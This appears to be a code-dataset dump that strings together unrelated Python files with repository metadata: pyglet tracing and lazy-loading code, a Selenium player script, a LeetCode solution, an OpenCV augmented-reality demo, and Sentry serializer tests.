try:
filename = _trace_filename_abbreviations[path]
except KeyError:
# Trim path down
dir = ''
path, filename = os.path.split(path)
while len(dir + filename) < 30:
filename = os.path.join(dir, filename)
path, dir = os.path.split(path)
if not dir:
filename = os.path.join('', filename)
break
else:
filename = os.path.join('...', filename)
_trace_filename_abbreviations[path] = filename
location = '(%s:%d)' % (filename, line)
if indent:
name = 'Called from %s' % name
print '[%d] %s%s %s' % (thread, indent, name, location)
if _trace_args:
if is_ctypes:
args = [_trace_repr(arg) for arg in frame.f_locals['args']]
print ' %sargs=(%s)' % (indent, ', '.join(args))
else:
for argname in code.co_varnames[:code.co_argcount]:
try:
argvalue = _trace_repr(frame.f_locals[argname])
print ' %s%s=%s' % (indent, argname, argvalue)
except:
pass
if _trace_flush:
sys.stdout.flush()
def _thread_trace_func(thread):
def _trace_func(frame, event, arg):
if event == 'call':
indent = ''
for i in range(_trace_depth):
_trace_frame(thread, frame, indent)
indent += ' '
frame = frame.f_back
if not frame:
break
elif event == 'exception':
(exception, value, traceback) = arg
print 'First chance exception raised:', repr(exception)
return _trace_func
def _install_trace():
global _trace_thread_count
sys.setprofile(_thread_trace_func(_trace_thread_count))
_trace_thread_count += 1
_trace_thread_count = 0
_trace_args = options['debug_trace_args']
_trace_depth = options['debug_trace_depth']
_trace_flush = options['debug_trace_flush']
if options['debug_trace']:
_install_trace()
# Lazy loading
# ------------
class _ModuleProxy(object):
_module = None
def __init__(self, name):
self.__dict__['_module_name'] = name
def __getattr__(self, name):
try:
return getattr(self._module, name)
except AttributeError:
if self._module is not None:
raise
import_name = 'pyglet.%s' % self._module_name
__import__(import_name)
module = sys.modules[import_name]
object.__setattr__(self, '_module', module)
globals()[self._module_name] = module
return getattr(module, name)
def __setattr__(self, name, value):
try:
setattr(self._module, name, value)
except AttributeError:
if self._module is not None:
raise
import_name = 'pyglet.%s' % self._module_name
__import__(import_name)
module = sys.modules[import_name]
object.__setattr__(self, '_module', module)
globals()[self._module_name] = module
setattr(module, name, value)
if True:
app = _ModuleProxy('app')
canvas = _ModuleProxy('canvas')
clock = _ModuleProxy('clock')
com = _ModuleProxy('com')
event = _ModuleProxy('event')
font = _ModuleProxy('font')
gl = _ModuleProxy('gl')
graphics = _ModuleProxy('graphics')
image = _ModuleProxy('image')
input = _ModuleProxy('input')
lib = _ModuleProxy('lib')
media = _ModuleProxy('media')
resource = _ModuleProxy('resource')
sprite = _ModuleProxy('sprite')
text = _ModuleProxy('text')
window = _ModuleProxy('window')
# Fool py2exe, py2app into including all top-level modules (doesn't understand
# lazy loading)
if False:
import app
import canvas
import clock
import com
import event
import font
import gl
import graphics
import input
import image
import lib
import media
import resource
import sprite
import text
import window
# Hack around some epydoc bug that causes it to think pyglet.window is None.
if False:
import window
| 34.385167 | 114 | 0.644542 |
c733d05361a02b979e1b0d9c33d099077d656562 | 2,370 | py | Python | selenium__examples/music_yandex_ru/set_progress_playing_track.py | DazEB2/SimplePyScripts | 1dde0a42ba93fe89609855d6db8af1c63b1ab7cc | [
"CC-BY-4.0"
] | 117 | 2015-12-18T07:18:27.000Z | 2022-03-28T00:25:54.000Z | selenium__examples/music_yandex_ru/set_progress_playing_track.py | DazEB2/SimplePyScripts | 1dde0a42ba93fe89609855d6db8af1c63b1ab7cc | [
"CC-BY-4.0"
] | 8 | 2018-10-03T09:38:46.000Z | 2021-12-13T19:51:09.000Z | selenium__examples/music_yandex_ru/set_progress_playing_track.py | DazEB2/SimplePyScripts | 1dde0a42ba93fe89609855d6db8af1c63b1ab7cc | [
"CC-BY-4.0"
] | 28 | 2016-08-02T17:43:47.000Z | 2022-03-21T08:31:12.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import itertools
import time
import re
import sys
# pip install selenium
from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
from selenium.common.exceptions import NoSuchElementException, StaleElementReferenceException
sys.path.append('get_all_tracks_playlist')
from common import Track, get_track, seconds_to_str
from config import profile, url
from run_first_track import play_track
SEARCHING_TRACK = 'Шишки-телепаты'
driver = None
try:
# Mute
profile.set_preference("media.volume_scale", "0.0")
driver = webdriver.Firefox(profile)
driver.implicitly_wait(2)
driver.get(url)
print(f'Title: {driver.title!r}')
time.sleep(2)
play_track(driver, SEARCHING_TRACK)
player_progress_el = driver.find_element_by_css_selector('.player-progress')
progress__line_el = player_progress_el.find_element_by_css_selector('.progress__bar.progress__progress > .progress__line')
progress_values = itertools.cycle([0, 10, 20, 35, 50, 75, 90, 100])
while True:
try:
track_playing_el = driver.find_element_by_css_selector('.d-track_playing')
track = get_track(track_playing_el)
except (NoSuchElementException, StaleElementReferenceException):
continue
progress_value = next(progress_values)
print(f'[#] Set progress value: {progress_value}')
offset_x = player_progress_el.size['width'] * (progress_value / 100)
offset_y = player_progress_el.size['height'] / 2
ActionChains(driver).move_to_element_with_offset(
player_progress_el, offset_x, offset_y
).click().perform()
total_seconds = track.get_seconds()
value = progress__line_el.get_attribute('style')
# Example: style="transform: scaleX(0.4728);"
m = re.search(r'scaleX\((.+?)\);', value)
if m:
progress_percent = float(m.group(1))
progress_left = total_seconds * progress_percent
progress_left_str = seconds_to_str(progress_left)
progress_right_str = seconds_to_str(total_seconds)
print(f'{track.title}. {progress_left_str} / {progress_right_str} ({progress_percent:.1%})')
time.sleep(1)
finally:
if driver:
driver.quit()
| 30.384615 | 126 | 0.698312 |
f8f6fb4f5174ea4f5e9c897312893c77de18de33 | 358 | py | Python | app/gwells/views/APIViews.py | cvarjao/gwells | cb47ec1d0c31b6f1586843e491f7cb5f1b98d61a | [
"Apache-2.0"
] | 1 | 2020-01-29T22:42:40.000Z | 2020-01-29T22:42:40.000Z | app/gwells/views/APIViews.py | matthewhall78/gwells | cb47ec1d0c31b6f1586843e491f7cb5f1b98d61a | [
"Apache-2.0"
] | 1 | 2018-05-02T05:28:33.000Z | 2018-05-09T15:58:07.000Z | app/gwells/views/APIViews.py | matthewhall78/gwells | cb47ec1d0c31b6f1586843e491f7cb5f1b98d61a | [
"Apache-2.0"
] | 1 | 2018-05-02T23:56:48.000Z | 2018-05-02T23:56:48.000Z | from rest_framework.generics import ListAPIView
from gwells.serializers import SurveySerializer
from gwells.models.Survey import Survey
class SurveyListView(ListAPIView):
"""
get: returns a list of active surveys
"""
serializer_class = SurveySerializer
queryset = Survey.objects.filter(survey_enabled=True)
pagination_class = None
| 25.571429 | 57 | 0.773743 |
2496ca229c2c1a1f98abcabdae372cf83e34b455 | 508 | py | Python | slp/config/moviecorpus.py | manzar96/movie_corpus_chatbot | 59de55de261330ed87b652dac6f8e045bf4fffcf | [
"MIT"
] | null | null | null | slp/config/moviecorpus.py | manzar96/movie_corpus_chatbot | 59de55de261330ed87b652dac6f8e045bf4fffcf | [
"MIT"
] | 1 | 2020-12-05T22:57:13.000Z | 2020-12-05T22:57:13.000Z | slp/config/moviecorpus.py | manzar96/movie_corpus_chatbot | 59de55de261330ed87b652dac6f8e045bf4fffcf | [
"MIT"
] | null | null | null | from enum import Enum
MOVIECORPUS_URL = 'http://www.cs.cornell.edu/~cristian/data' \
'/cornell_movie_dialogs_corpus.zip'
class SPECIAL_TOKENS(Enum):
PAD = '[PAD]'
MASK = '[MASK]'
UNK = '[UNK]'
BOS = '[BOS]'
EOS = '[EOS]'
CLS = '[CLS]'
@classmethod
def has_token(cls, token):
return any(token == t.name or token == t.value
for t in cls)
@classmethod
def to_list(cls):
return list(map(lambda x: x.value, cls))
| 20.32 | 62 | 0.55315 |
ab28da2a5eaa377b2794e26a50717290ef685cc2 | 2,499 | py | Python | nanpack/tests/test_thirdpartyinstalls.py | vxsharma-14/DIFFUS | d70633890b8fb2e7b3dde918eb13b263f7a035ef | [
"MIT"
] | 14 | 2021-01-28T06:52:15.000Z | 2021-03-05T01:34:30.000Z | nanpack/tests/test_thirdpartyinstalls.py | vxsharma-14/DIFFUS | d70633890b8fb2e7b3dde918eb13b263f7a035ef | [
"MIT"
] | 2 | 2020-12-23T10:44:09.000Z | 2020-12-24T12:02:25.000Z | nanpack/tests/test_thirdpartyinstalls.py | vxsharma-14/DIFFUS | d70633890b8fb2e7b3dde918eb13b263f7a035ef | [
"MIT"
] | 2 | 2021-01-28T06:52:17.000Z | 2021-01-30T12:35:52.000Z | # ***********************************************************************
#
# FILE test_requiredinstalls.py
#
# AUTHOR Dr. Vishal Sharma
#
# VERSION 1.0.0-alpha4
#
# WEBSITE https://github.com/vxsharma-14/project-NAnPack
#
# NAnPack Learner's Edition is distributed under the MIT License.
#
# Copyright (c) 2020 Vishal Sharma
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# You should have received a copy of the MIT License along with
# NAnPack Learner's Edition.
#
# ***********************************************************************
def test_3rdpartypackage():
"""Test numpy and matplotlib installation."""
try:
import numpy as np
import matplotlib.pyplot as plt
x = np.arange(0, 361, 10)
y = np.sin(x*3.14/180.0)
plt.plot(x, y)
plt.title("Plot of sin(theta)")
plt.xlabel("X")
plt.ylabel("sin(theta)")
plt.xlim(0, 360)
print("Close plot to continue testing.")
plt.show()
except:
print("")
def test_mathpackage():
"""Test math package."""
import math
mp = round(math.pi, 2)
assert mp == 3.14
if __name__ == "__main__":
test_3rdpartypackage()
print("Numpy package test SUCCESS.")
print("Matplotlib package test SUCCESS.")
test_mathpackage()
print("Math package test SUCCESS.")
| 34.708333 | 76 | 0.618247 |
c834d9f137d41d2bb5017e67c608124d0d164ede | 1,341 | py | Python | Hard/Nth_Magical_Number.py | dianjiaogit/LeetCode_Python_solution | 390693c839d1be8802c21ea81062443b6d5ea36f | [
"MIT"
] | null | null | null | Hard/Nth_Magical_Number.py | dianjiaogit/LeetCode_Python_solution | 390693c839d1be8802c21ea81062443b6d5ea36f | [
"MIT"
] | null | null | null | Hard/Nth_Magical_Number.py | dianjiaogit/LeetCode_Python_solution | 390693c839d1be8802c21ea81062443b6d5ea36f | [
"MIT"
] | null | null | null | # A positive integer is magical if it is divisible by either A or B.
# Return the N-th magical number. Since the answer may be very large, return it modulo 10^9 + 7.
# Example 1:
# Input: N = 1, A = 2, B = 3
# Output: 2
# Example 2:
# Input: N = 4, A = 2, B = 3
# Output: 6
# Example 3:
# Input: N = 5, A = 2, B = 4
# Output: 10
# Example 4:
# Input: N = 3, A = 6, B = 4
# Output: 8
# Note:
# 1 <= N <= 10^9
# 2 <= A <= 40000
# 2 <= B <= 40000
class Solution(object):
def nthMagicalNumber(self, N, A, B):
"""
:type N: int
:type A: int
:type B: int
:rtype: int
"""
x = A
y = B
if x > y:
greater = x
smaller = y
else:
greater = y
smaller = x
while(True):
if((greater % x == 0) and (greater % y == 0)):
lcm = greater
break
greater += 1
if A == B:
return (N * A) % (10 ** 9 + 7)
for i in range(1,smaller + 1):
if((x % i == 0) and (y % i == 0)):
hcf = i
n = int(N / 2) * min(A, B)
a = int(n / A) + int(n / B) - int(n / lcm)
while a < N:
n += hcf
if n % A == 0 or n % B == 0:
a += 1
return n % (10 ** 9 + 7) | 20.953125 | 97 | 0.40343 |
22b059b73632e420a59a4ba7590ab37dc527218a | 8,040 | py | Python | src/ar_main2.py | mtc-20/augmented-reality | f86c1df4d21b87c95fd294e4553db649ec0857a1 | [
"MIT"
] | null | null | null | src/ar_main2.py | mtc-20/augmented-reality | f86c1df4d21b87c95fd294e4553db649ec0857a1 | [
"MIT"
] | null | null | null | src/ar_main2.py | mtc-20/augmented-reality | f86c1df4d21b87c95fd294e4553db649ec0857a1 | [
"MIT"
] | 1 | 2021-07-02T10:42:30.000Z | 2021-07-02T10:42:30.000Z | '''
Created on Saturday, 31st October 2019
@author: mtc-20
Coded on VS Code 2019
------
Overview:
------
Last Modified: Sun Oct 04 2020
'''
# Useful links
# http://www.pygame.org/wiki/OBJFileLoader
# TODO -> Implement command line arguments (scale, model and object to be projected)
# TODO -> Refactor and organize code (proper funcition definition and separation, classes, error handling...)
from __future__ import print_function
import argparse
import cv2
import numpy as np
import math
import os
from objloader_simple import *
import time
# Minimum number of matches that have to be found
# to consider the recognition valid
MIN_MATCHES = 30
def main():
"""
This functions loads the target surface image,
"""
homography = None
# matrix of camera parameters (made up but works quite well for me)
camera_parameters = np.array([[800, 0, 320], [0, 800, 240], [0, 0, 1]])
# create ORB keypoint detector
orb = cv2.ORB_create()
# create BFMatcher object based on hamming distance
bf = cv2.BFMatcher(cv2.NORM_HAMMING2, crossCheck=True)
# load the reference surface that will be searched in the video stream
dir_name = os.getcwd()
model = cv2.imread(os.path.join(dir_name, './../reference/logo_black.png'), 0)
#model = cv2.flip(model, 1)
# Compute model keypoints and its descriptors
kp_model, des_model = orb.detectAndCompute(model, None)
# Load 3D model from OBJ file
obj = OBJ(os.path.join(dir_name, './../models/cow.obj'), swapyz=True)
# init video capture
cap = cv2.VideoCapture(0)
print("[INFO] Warming up camera...")
time.sleep(3)
# # save video capture
# frame_width = int(cap.get(3))
# frame_height = int(cap.get(4))
# out = cv2.VideoWriter('outpy.avi',cv2.VideoWriter_fourcc('M','J','P','G'), 10, (frame_width,frame_height))
# #out = cv2.VideoWriter('output.avi', fourcc, 20.0, (640,480))
while True:
# read the current frame
ret, frame = cap.read()
if not ret:
print ("[ERR] Unable to capture video!")
print("[INFO] Closing...")
break
# find and draw the keypoints of the frame
kp_frame, des_frame = orb.detectAndCompute(frame, None)
# match frame descriptors with model descriptors
matches = bf.match(des_model, des_frame)
# sort them in the order of their distance
# the lower the distance, the better the match
matches = sorted(matches, key=lambda x: x.distance)
# filter out poor matches
good = []
for i, m in enumerate(matches):
if i < len(matches) - 1 and m.distance < 0.75 * matches[i+1].distance:
good.append(m)
# compute Homography if enough matches are found
if len(matches) > MIN_MATCHES:
# differentiate between source points and destination points
src_pts = np.float32([kp_model[m.queryIdx].pt for m in matches]).reshape(-1, 1, 2)
dst_pts = np.float32([kp_frame[m.trainIdx].pt for m in matches]).reshape(-1, 1, 2)
# compute Homography
homography, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)
if True: #args.rectangle:
# Draw a rectangle that marks the found model in the frame
h, w = model.shape
pts = np.float32([[0, 0], [0, h - 1], [w - 1, h - 1], [w - 1, 0]]).reshape(-1, 1, 2)
# project corners into frame
dst = cv2.perspectiveTransform(pts, homography)
# connect them with lines
frame = cv2.polylines(frame, [np.int32(dst)], True, 255, 3, cv2.LINE_AA)
# if a valid homography matrix was found render cube on model plane
if homography is not None:
try:
# obtain 3D projection matrix from homography matrix and camera parameters
projection = projection_matrix(camera_parameters, homography)
# project cube or model
frame = render(frame, obj, projection, model, False)
#frame = render(frame, model, projection)
except:
pass
# draw first 10 matches.
if True: #args.matches:
frame = cv2.drawMatches(model, kp_model, frame, kp_frame, matches[:10], 0, flags=2)
# show result
#out.write(frame)
cv2.imshow('frame', frame)
k = cv2.waitKey(1)
if k%256 == 27:
print("[INFO] User pressed Esc, closing...")
break
else:
print ("Not enough good matches found - %d/%d for %d" % (len(matches),len(good), MIN_MATCHES))
cap.release()
#out.release()
cv2.destroyAllWindows()
return 0
def render(img, obj, projection, model, color=False):
"""
Render a loaded obj model into the current video frame
"""
vertices = obj.vertices
scale_matrix = np.eye(3) * 0.2
h, w = model.shape
for face in obj.faces:
face_vertices = face[0]
points = np.array([vertices[vertex - 1] for vertex in face_vertices])
points = np.dot(points, scale_matrix)
# render model in the middle of the reference surface. To do so,
# model points must be displaced
points = np.array([[p[0] + w / 2, p[1] + h / 2, p[2]] for p in points])
dst = cv2.perspectiveTransform(points.reshape(-1, 1, 3), projection)
imgpts = np.int32(dst)
if color is False:
cv2.fillConvexPoly(img, imgpts, (109, 109, 0))
else:
color = hex_to_rgb(face[-1])
color = color[::-1] # reverse
cv2.fillConvexPoly(img, imgpts, color)
return img
def projection_matrix(camera_parameters, homography):
"""
From the camera calibration matrix and the estimated homography
compute the 3D projection matrix
"""
# Compute rotation along the x and y axis as well as the translation
homography = homography * (-1)
rot_and_transl = np.dot(np.linalg.inv(camera_parameters), homography)
col_1 = rot_and_transl[:, 0]
col_2 = rot_and_transl[:, 1]
col_3 = rot_and_transl[:, 2]
# normalise vectors
l = math.sqrt(np.linalg.norm(col_1, 2) * np.linalg.norm(col_2, 2))
rot_1 = col_1 / l
rot_2 = col_2 / l
translation = col_3 / l
# compute the orthonormal basis
c = rot_1 + rot_2
p = np.cross(rot_1, rot_2)
d = np.cross(c, p)
rot_1 = np.dot(c / np.linalg.norm(c, 2) + d / np.linalg.norm(d, 2), 1 / math.sqrt(2))
rot_2 = np.dot(c / np.linalg.norm(c, 2) - d / np.linalg.norm(d, 2), 1 / math.sqrt(2))
rot_3 = np.cross(rot_1, rot_2)
# finally, compute the 3D projection matrix from the model to the current frame
projection = np.stack((rot_1, rot_2, rot_3, translation)).T
return np.dot(camera_parameters, projection)
def hex_to_rgb(hex_color):
"""
Helper function to convert hex strings to RGB
"""
hex_color = hex_color.lstrip('#')
h_len = len(hex_color)
return tuple(int(hex_color[i:i + h_len // 3], 16) for i in range(0, h_len, h_len // 3))
# # Command line argument parsing
# # NOT ALL OF THEM ARE SUPPORTED YET
# parser = argparse.ArgumentParser(description='Augmented reality application')
# parser.add_argument('-r','--rectangle', help = 'draw rectangle delimiting target surface on frame', action = 'store_true')
# parser.add_argument('-mk','--model_keypoints', help = 'draw model keypoints', action = 'store_true')
# parser.add_argument('-fk','--frame_keypoints', help = 'draw frame keypoints', action = 'store_true')
# parser.add_argument('-ma','--matches', help = 'draw matches between keypoints', action = 'store_true')
# # TODO jgallostraa -> add support for model specification
# #parser.add_argument('-mo','--model', help = 'Specify model to be projected', action = 'store_true')
# args = parser.parse_args()
if __name__ == '__main__':
main()
| 39.029126 | 124 | 0.620025 |
ee8e7cda6e4ce11412f226862a21abfa73fc316c | 15,251 | py | Python | tests/snuba/api/serializers/test_group.py | pierredup/sentry | 0145e4b3bc0e775bf3482fe65f5e1a689d0dbb80 | [
"BSD-3-Clause"
] | null | null | null | tests/snuba/api/serializers/test_group.py | pierredup/sentry | 0145e4b3bc0e775bf3482fe65f5e1a689d0dbb80 | [
"BSD-3-Clause"
] | null | null | null | tests/snuba/api/serializers/test_group.py | pierredup/sentry | 0145e4b3bc0e775bf3482fe65f5e1a689d0dbb80 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import absolute_import
from sentry.utils.compat import mock
import six
from datetime import timedelta
from django.utils import timezone
from sentry.utils.compat.mock import patch
from sentry.api.serializers import serialize
from sentry.api.serializers.models.group import (
GroupSerializerSnuba,
StreamGroupSerializerSnuba,
snuba_tsdb,
)
from sentry.models import (
Group,
Environment,
GroupEnvironment,
GroupLink,
GroupResolution,
GroupSnooze,
GroupStatus,
GroupSubscription,
UserOption,
UserOptionValue,
)
from sentry.testutils import APITestCase, SnubaTestCase
from sentry.testutils.helpers.datetime import iso_format, before_now
class GroupSerializerSnubaTest(APITestCase, SnubaTestCase):
def setUp(self):
super(GroupSerializerSnubaTest, self).setUp()
self.min_ago = before_now(minutes=1)
self.day_ago = before_now(days=1)
self.week_ago = before_now(days=7)
def test_permalink(self):
group = self.create_group()
result = serialize(group, self.user, serializer=GroupSerializerSnuba())
assert "http://" in result["permalink"]
assert "{}/issues/{}".format(group.organization.slug, group.id) in result["permalink"]
def test_permalink_outside_org(self):
outside_user = self.create_user()
group = self.create_group()
result = serialize(group, outside_user, serializer=GroupSerializerSnuba())
assert result["permalink"] is None
def test_is_ignored_with_expired_snooze(self):
now = timezone.now()
user = self.create_user()
group = self.create_group(status=GroupStatus.IGNORED)
GroupSnooze.objects.create(group=group, until=now - timedelta(minutes=1))
result = serialize(group, user, serializer=GroupSerializerSnuba())
assert result["status"] == "unresolved"
assert result["statusDetails"] == {}
def test_is_ignored_with_valid_snooze(self):
now = timezone.now()
user = self.create_user()
group = self.create_group(status=GroupStatus.IGNORED)
snooze = GroupSnooze.objects.create(group=group, until=now + timedelta(minutes=1))
result = serialize(group, user, serializer=GroupSerializerSnuba())
assert result["status"] == "ignored"
assert result["statusDetails"]["ignoreCount"] == snooze.count
assert result["statusDetails"]["ignoreWindow"] == snooze.window
assert result["statusDetails"]["ignoreUserCount"] == snooze.user_count
assert result["statusDetails"]["ignoreUserWindow"] == snooze.user_window
assert result["statusDetails"]["ignoreUntil"] == snooze.until
assert result["statusDetails"]["actor"] is None
def test_is_ignored_with_valid_snooze_and_actor(self):
now = timezone.now()
user = self.create_user()
group = self.create_group(status=GroupStatus.IGNORED)
GroupSnooze.objects.create(group=group, until=now + timedelta(minutes=1), actor_id=user.id)
result = serialize(group, user, serializer=GroupSerializerSnuba())
assert result["status"] == "ignored"
assert result["statusDetails"]["actor"]["id"] == six.text_type(user.id)
def test_resolved_in_next_release(self):
release = self.create_release(project=self.project, version="a")
user = self.create_user()
group = self.create_group(status=GroupStatus.RESOLVED)
GroupResolution.objects.create(
group=group, release=release, type=GroupResolution.Type.in_next_release
)
result = serialize(group, user, serializer=GroupSerializerSnuba())
assert result["status"] == "resolved"
assert result["statusDetails"] == {"inNextRelease": True, "actor": None}
def test_resolved_in_release(self):
release = self.create_release(project=self.project, version="a")
user = self.create_user()
group = self.create_group(status=GroupStatus.RESOLVED)
GroupResolution.objects.create(
group=group, release=release, type=GroupResolution.Type.in_release
)
result = serialize(group, user, serializer=GroupSerializerSnuba())
assert result["status"] == "resolved"
assert result["statusDetails"] == {"inRelease": "a", "actor": None}
def test_resolved_with_actor(self):
release = self.create_release(project=self.project, version="a")
user = self.create_user()
group = self.create_group(status=GroupStatus.RESOLVED)
GroupResolution.objects.create(
group=group, release=release, type=GroupResolution.Type.in_release, actor_id=user.id
)
result = serialize(group, user, serializer=GroupSerializerSnuba())
assert result["status"] == "resolved"
assert result["statusDetails"]["actor"]["id"] == six.text_type(user.id)
def test_resolved_in_commit(self):
repo = self.create_repo(project=self.project)
commit = self.create_commit(repo=repo)
user = self.create_user()
group = self.create_group(status=GroupStatus.RESOLVED)
GroupLink.objects.create(
group_id=group.id,
project_id=group.project_id,
linked_id=commit.id,
linked_type=GroupLink.LinkedType.commit,
relationship=GroupLink.Relationship.resolves,
)
result = serialize(group, user, serializer=GroupSerializerSnuba())
assert result["status"] == "resolved"
assert result["statusDetails"]["inCommit"]["id"] == commit.key
@patch("sentry.models.Group.is_over_resolve_age")
def test_auto_resolved(self, mock_is_over_resolve_age):
mock_is_over_resolve_age.return_value = True
user = self.create_user()
group = self.create_group(status=GroupStatus.UNRESOLVED)
result = serialize(group, user, serializer=GroupSerializerSnuba())
assert result["status"] == "resolved"
assert result["statusDetails"] == {"autoResolved": True}
def test_subscribed(self):
user = self.create_user()
group = self.create_group()
GroupSubscription.objects.create(
user=user, group=group, project=group.project, is_active=True
)
result = serialize(group, user, serializer=GroupSerializerSnuba())
assert result["isSubscribed"]
assert result["subscriptionDetails"] == {"reason": "unknown"}
def test_explicit_unsubscribed(self):
user = self.create_user()
group = self.create_group()
GroupSubscription.objects.create(
user=user, group=group, project=group.project, is_active=False
)
result = serialize(group, user, serializer=GroupSerializerSnuba())
assert not result["isSubscribed"]
assert not result["subscriptionDetails"]
def test_implicit_subscribed(self):
user = self.create_user()
group = self.create_group()
combinations = (
# ((default, project), (subscribed, details))
((UserOptionValue.all_conversations, None), (True, None)),
((UserOptionValue.all_conversations, UserOptionValue.all_conversations), (True, None)),
(
(UserOptionValue.all_conversations, UserOptionValue.participating_only),
(False, None),
),
(
(UserOptionValue.all_conversations, UserOptionValue.no_conversations),
(False, {"disabled": True}),
),
((None, None), (False, None)),
((UserOptionValue.participating_only, None), (False, None)),
((UserOptionValue.participating_only, UserOptionValue.all_conversations), (True, None)),
(
(UserOptionValue.participating_only, UserOptionValue.participating_only),
(False, None),
),
(
(UserOptionValue.participating_only, UserOptionValue.no_conversations),
(False, {"disabled": True}),
),
((UserOptionValue.no_conversations, None), (False, {"disabled": True})),
((UserOptionValue.no_conversations, UserOptionValue.all_conversations), (True, None)),
((UserOptionValue.no_conversations, UserOptionValue.participating_only), (False, None)),
(
(UserOptionValue.no_conversations, UserOptionValue.no_conversations),
(False, {"disabled": True}),
),
)
def maybe_set_value(project, value):
if value is not None:
UserOption.objects.set_value(
user=user, project=project, key="workflow:notifications", value=value
)
else:
UserOption.objects.unset_value(
user=user, project=project, key="workflow:notifications"
)
for options, (is_subscribed, subscription_details) in combinations:
default_value, project_value = options
UserOption.objects.clear_local_cache()
maybe_set_value(None, default_value)
maybe_set_value(group.project, project_value)
result = serialize(group, user, serializer=GroupSerializerSnuba())
assert result["isSubscribed"] is is_subscribed
assert result.get("subscriptionDetails") == subscription_details
def test_global_no_conversations_overrides_group_subscription(self):
user = self.create_user()
group = self.create_group()
GroupSubscription.objects.create(
user=user, group=group, project=group.project, is_active=True
)
UserOption.objects.set_value(
user=user,
project=None,
key="workflow:notifications",
value=UserOptionValue.no_conversations,
)
result = serialize(group, user, serializer=GroupSerializerSnuba())
assert not result["isSubscribed"]
assert result["subscriptionDetails"] == {"disabled": True}
def test_project_no_conversations_overrides_group_subscription(self):
user = self.create_user()
group = self.create_group()
GroupSubscription.objects.create(
user=user, group=group, project=group.project, is_active=True
)
UserOption.objects.set_value(
user=user,
project=group.project,
key="workflow:notifications",
value=UserOptionValue.no_conversations,
)
result = serialize(group, user, serializer=GroupSerializerSnuba())
assert not result["isSubscribed"]
assert result["subscriptionDetails"] == {"disabled": True}
def test_no_user_unsubscribed(self):
group = self.create_group()
result = serialize(group, serializer=GroupSerializerSnuba())
assert not result["isSubscribed"]
def test_seen_stats(self):
environment = self.create_environment(project=self.project)
environment2 = self.create_environment(project=self.project)
events = []
for event_id, env, user_id, timestamp in [
("a" * 32, environment, 1, iso_format(self.min_ago)),
("b" * 32, environment, 2, iso_format(self.min_ago)),
("c" * 32, environment2, 3, iso_format(self.week_ago)),
]:
events.append(
self.store_event(
data={
"event_id": event_id,
"fingerprint": ["put-me-in-group1"],
"timestamp": timestamp,
"environment": env.name,
"user": {"id": user_id},
},
project_id=self.project.id,
)
)
# Assert all events are in the same group
(group_id,) = set(e.group.id for e in events)
group = Group.objects.get(id=group_id)
group.times_seen = 3
group.first_seen = self.week_ago - timedelta(days=5)
group.last_seen = self.week_ago
group.save()
# should use group columns when no environments arg passed
result = serialize(group, serializer=GroupSerializerSnuba(environment_ids=[]))
assert result["count"] == "3"
assert iso_format(result["lastSeen"]) == iso_format(self.min_ago)
assert result["firstSeen"] == group.first_seen
# update this to something different to make sure it's being used
group_env = GroupEnvironment.objects.get(group_id=group_id, environment_id=environment.id)
group_env.first_seen = self.day_ago - timedelta(days=3)
group_env.save()
group_env2 = GroupEnvironment.objects.get(group_id=group_id, environment_id=environment2.id)
result = serialize(
group,
serializer=GroupSerializerSnuba(environment_ids=[environment.id, environment2.id]),
)
assert result["count"] == "3"
# result is rounded down to nearest second
assert iso_format(result["lastSeen"]) == iso_format(self.min_ago)
assert iso_format(result["firstSeen"]) == iso_format(group_env.first_seen)
assert iso_format(group_env2.first_seen) > iso_format(group_env.first_seen)
assert result["userCount"] == 3
# test userCount, count, lastSeen filtering correctly by time
# firstSeen should still be from GroupEnvironment
result = serialize(
group,
serializer=GroupSerializerSnuba(
environment_ids=[environment.id, environment2.id],
start=self.week_ago - timedelta(hours=1),
end=self.week_ago + timedelta(hours=1),
),
)
assert result["userCount"] == 1
assert iso_format(result["lastSeen"]) == iso_format(self.week_ago)
assert iso_format(result["firstSeen"]) == iso_format(group_env.first_seen)
assert result["count"] == "1"
class StreamGroupSerializerTestCase(APITestCase, SnubaTestCase):
def test_environment(self):
group = self.group
environment = Environment.get_or_create(group.project, "production")
with mock.patch(
"sentry.api.serializers.models.group.snuba_tsdb.get_range",
side_effect=snuba_tsdb.get_range,
) as get_range:
serialize(
[group],
serializer=StreamGroupSerializerSnuba(
environment_ids=[environment.id], stats_period="14d"
),
)
assert get_range.call_count == 1
for args, kwargs in get_range.call_args_list:
assert kwargs["environment_ids"] == [environment.id]
with mock.patch(
"sentry.api.serializers.models.group.snuba_tsdb.get_range",
side_effect=snuba_tsdb.get_range,
) as get_range:
serialize(
[group],
serializer=StreamGroupSerializerSnuba(environment_ids=None, stats_period="14d"),
)
assert get_range.call_count == 1
for args, kwargs in get_range.call_args_list:
assert kwargs["environment_ids"] is None
| 39.819843 | 100 | 0.636548 |
81e2a80dc6b2977de2314bab6b2a9b336abfe7ed | 54,099 | py | Python | python/cudf/dataframe/dataframe.py | OlivierNV/cudf | 7aa3799e73948899a85e70bc73d3cea50b65dff1 | [
"Apache-2.0"
] | 1 | 2019-08-13T17:19:42.000Z | 2019-08-13T17:19:42.000Z | python/cudf/dataframe/dataframe.py | OlivierNV/cudf | 7aa3799e73948899a85e70bc73d3cea50b65dff1 | [
"Apache-2.0"
